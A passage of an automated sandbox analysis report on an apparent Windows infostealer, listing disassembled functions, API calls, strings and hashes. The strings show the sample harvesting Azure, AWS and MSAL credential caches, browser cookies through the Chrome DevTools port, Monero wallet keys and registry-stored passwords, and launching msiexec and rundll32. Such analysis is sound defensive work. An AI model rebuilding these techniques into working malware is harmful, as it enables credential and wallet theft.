                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 635742e2e82ec5c0e6fe4ddde437119174a166cfca75f500f12b00135dc10731
                                  • Instruction ID: cf8023ea28498cac051c5bc014b58d10384578f6ccfb73ba6ea46dee7122d601
                                  • Opcode Fuzzy Hash: 635742e2e82ec5c0e6fe4ddde437119174a166cfca75f500f12b00135dc10731
                                  • Instruction Fuzzy Hash: 0141B3B6A8030867DB24F770EC47FDD73685B60700F4095A4B64D760C5EEB49BC88B92
                                  Function 00E73080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E73415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E735AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E7373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: aaeda9d7d8dde83f8cf29f61f9f97cec36ab057e16414ad11c930e2665a16397
                                  • Instruction ID: 1ccf1ec291bb8fe9090ccccadc62811534e16ac009e8036d397a1e153b77f1fa
                                  • Opcode Fuzzy Hash: aaeda9d7d8dde83f8cf29f61f9f97cec36ab057e16414ad11c930e2665a16397
                                  • Instruction Fuzzy Hash: 8C1223719101089ADB19FBA0DDA2FEEB7B9AF54300F1491A9F10E76195EF302B49CF51
                                  Function 00E69BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E69A50: InternetOpenA.WININET(00E80AF6,00000001,00000000,00000000,00000000), ref: 00E69A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00E69CAF
                                  • lstrcat.KERNEL32(?,00E812C4), ref: 00E69CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00E69CD5
                                  • lstrcat.KERNEL32(?,00E812C8), ref: 00E69CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00E69CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00E69D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00E69D17
                                  • lstrlen.KERNEL32(00000000), ref: 00E69D26
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: 7eb130092bc633c99a6a7abcf5b354f40fafe020c2eea760cc4865e725604c26
                                  • Instruction ID: 3d49d90c1143f84cdae114e81a777f2e0bd0af393485eee5ee445406b8b5a841
                                  • Opcode Fuzzy Hash: 7eb130092bc633c99a6a7abcf5b354f40fafe020c2eea760cc4865e725604c26
                                  • Instruction Fuzzy Hash: E4516FB1840608ABDB14EBE0EC95FEE737CAB04301F405698F21AB7095EB305A49CF61
                                  Function 00E75510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E662D0: InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                    • Part of subcall function 00E662D0: StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                    • Part of subcall function 00E662D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                    • Part of subcall function 00E662D0: HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                    • Part of subcall function 00E662D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                    • Part of subcall function 00E662D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E75568
                                  • lstrlen.KERNEL32(00000000), ref: 00E7557F
                                    • Part of subcall function 00E78FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E78FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00E755B4
                                  • lstrlen.KERNEL32(00000000), ref: 00E755D3
                                  • lstrlen.KERNEL32(00000000), ref: 00E755FE
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 06c3928795d695ac642ed23fd263584203c064c1068396a4bb273656d4500580
                                  • Instruction ID: 9d2feac912b00199ae8b2cdc6293dd92ffae8e7b005e79c17f45500bbea62ef3
                                  • Opcode Fuzzy Hash: 06c3928795d695ac642ed23fd263584203c064c1068396a4bb273656d4500580
                                  • Instruction Fuzzy Hash: 2E510A719101089BCB18FF60CDA6AED77B9AF90340F54A468E50E7B592EB306B45CB62
                                  Function 00E71520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 82abd4dde4591a0c0e8e24ee88ef2ecb197dae34bf7fe76013ef387337e1e6d0
                                  • Instruction ID: 7a54993b692aa2ee3d08dc04d62bb8a2cd3f128a10fc4eddc4a37259cd5616ef
                                  • Opcode Fuzzy Hash: 82abd4dde4591a0c0e8e24ee88ef2ecb197dae34bf7fe76013ef387337e1e6d0
                                  • Instruction Fuzzy Hash: E5C195B5900219ABCB28EF60DC99FDE73B9AF94304F0495A8E50D77185DB30AA85CF91
                                  Function 00E744D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E7453C
                                  • lstrcat.KERNEL32(?,0173DE58), ref: 00E7455B
                                  • lstrcat.KERNEL32(?,?), ref: 00E7456F
                                  • lstrcat.KERNEL32(?,0173C998), ref: 00E74583
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F20: GetFileAttributesA.KERNEL32(00000000,?,00E61B94,?,?,00E8577C,?,?,00E80E22), ref: 00E78F2F
                                    • Part of subcall function 00E6A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E6A489
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                    • Part of subcall function 00E79550: GlobalAlloc.KERNEL32(00000000,-F,00E7462D), ref: 00E79563
                                  • StrStrA.SHLWAPI(?,0173DED0), ref: 00E74643
                                  • GlobalFree.KERNEL32(?), ref: 00E74762
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                    • Part of subcall function 00E6A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                    • Part of subcall function 00E6A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                    • Part of subcall function 00E6A210: LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E746F3
                                  • StrCmpCA.SHLWAPI(?,00E808D2), ref: 00E74710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E74722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00E74735
                                  • lstrcat.KERNEL32(00000000,00E80FA0), ref: 00E74744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e32fd7ff4be2faba99bedcb9b852ee109124e5c75e8f60b632b58213a47bb135
                                  • Instruction ID: a1ad97589af3dc6a4c31ae044f1b9daa7ac9eb608f02a68ff9c7df7868e84a85
                                  • Opcode Fuzzy Hash: e32fd7ff4be2faba99bedcb9b852ee109124e5c75e8f60b632b58213a47bb135
                                  • Instruction Fuzzy Hash: 3A7159B6900208ABDB18EBB0DD59FDD73B9AB88300F0495A8F619B7185EB34DB44CF51
                                  Function 00E61310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E612B4
                                    • Part of subcall function 00E612A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E612BB
                                    • Part of subcall function 00E612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E612D7
                                    • Part of subcall function 00E612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E612F5
                                    • Part of subcall function 00E612A0: RegCloseKey.ADVAPI32(?), ref: 00E612FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6134F
                                  • lstrlen.KERNEL32(?), ref: 00E6135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00E61377
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E61465
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E6A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                    • Part of subcall function 00E6A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                    • Part of subcall function 00E6A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                    • Part of subcall function 00E6A110: ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                    • Part of subcall function 00E6A110: LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                    • Part of subcall function 00E6A110: CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E614EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 02d231d1b4ca922dd5641e2c8841c125fe7ed00d068466d1c6ab03aa6568cd38
                                  • Instruction ID: fdd8ff10e061e348fdd241bbdf31f07d4c0154edaa6798d4cb05ce279bfe4088
                                  • Opcode Fuzzy Hash: 02d231d1b4ca922dd5641e2c8841c125fe7ed00d068466d1c6ab03aa6568cd38
                                  • Instruction Fuzzy Hash: 5F5123B295011957CB25FB60DD92FED73BC9B54300F4495F8B60E72092EE305B89CB66
                                  Function 00E69A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(00E80AF6,00000001,00000000,00000000,00000000), ref: 00E69A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E69AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00E69AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 4d26d20a8ec97cbec0917ee4c4031dd851f8e9a63f8bbacdac2781551d89df68
                                  • Instruction ID: f6146a920e9718d4e6471333ddf4a095a4cf8e7af7bd95ee069bd97df3068216
                                  • Opcode Fuzzy Hash: 4d26d20a8ec97cbec0917ee4c4031dd851f8e9a63f8bbacdac2781551d89df68
                                  • Instruction Fuzzy Hash: 1B415B75A50208EBDB24EFA0DC85FDD77B8AB48780F105198F50DBB190DBB0AE84CB60
                                  Function 00E67630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E67330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E6739A
                                    • Part of subcall function 00E67330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E67411
                                    • Part of subcall function 00E67330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E6746D
                                    • Part of subcall function 00E67330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E674B2
                                    • Part of subcall function 00E67330: HeapFree.KERNEL32(00000000), ref: 00E674B9
                                  • lstrcat.KERNEL32(00000000,00E8192C), ref: 00E67666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E676A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00E676BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E676EF
                                  • lstrcat.KERNEL32(00000000,00E81934), ref: 00E67700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00E67733
                                  • lstrcat.KERNEL32(00000000,00E81938), ref: 00E6774D
                                  • task.LIBCPMTD ref: 00E6775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
